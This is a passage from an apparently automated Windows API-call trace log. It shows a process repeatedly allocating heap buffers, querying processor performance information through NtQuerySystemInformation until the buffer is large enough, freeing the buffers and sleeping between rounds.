hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0275.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0275.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0275.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0275.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0275.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.219] Sleep (dwMilliseconds=0x110) [0275.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0275.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0275.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0275.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0275.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0275.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0275.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0275.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0275.239] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.239] Sleep (dwMilliseconds=0x110) [0275.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0275.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0275.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0275.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0275.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0275.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0275.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0275.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0275.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.253] Sleep (dwMilliseconds=0x110) [0275.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0275.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0275.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0275.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0275.270] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0275.270] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.271] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0275.271] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0275.271] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.271] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0275.271] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.272] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.272] Sleep (dwMilliseconds=0x110) [0275.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0275.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0275.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0275.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0275.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0275.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0275.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0275.285] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.286] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0275.286] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.287] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.287] Sleep (dwMilliseconds=0x110) [0275.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0275.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0275.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0275.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0275.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0275.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0275.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0275.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0275.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.298] Sleep (dwMilliseconds=0x110) [0275.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0275.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0275.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0275.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0275.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0275.317] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0275.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0275.318] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0275.318] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.318] Sleep (dwMilliseconds=0x110) [0275.325] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0275.325] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.326] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0275.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0275.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0275.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0275.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0275.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0275.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0275.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.332] Sleep (dwMilliseconds=0x110) [0275.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0275.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0275.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0275.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0275.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0275.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0275.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0275.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0275.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.345] Sleep (dwMilliseconds=0x110) [0275.358] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0275.358] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0275.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0275.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0275.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0275.360] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0275.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0275.360] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0275.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.361] Sleep (dwMilliseconds=0x110) [0275.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0275.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0275.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0275.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0275.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0275.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0275.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0275.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0275.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.379] Sleep (dwMilliseconds=0x110) [0275.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0275.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0275.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0275.407] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0275.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0275.407] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0275.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0275.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0275.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.409] Sleep (dwMilliseconds=0x110) [0275.420] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0275.420] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.421] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0275.421] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0275.421] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.421] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0275.422] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0275.422] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.422] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0275.422] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0275.422] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.423] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0275.423] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.423] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.423] Sleep (dwMilliseconds=0x110) [0275.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0275.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0275.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0275.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0275.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0275.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0275.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0275.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0275.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.439] Sleep (dwMilliseconds=0x110) [0275.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0275.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0275.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0275.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, 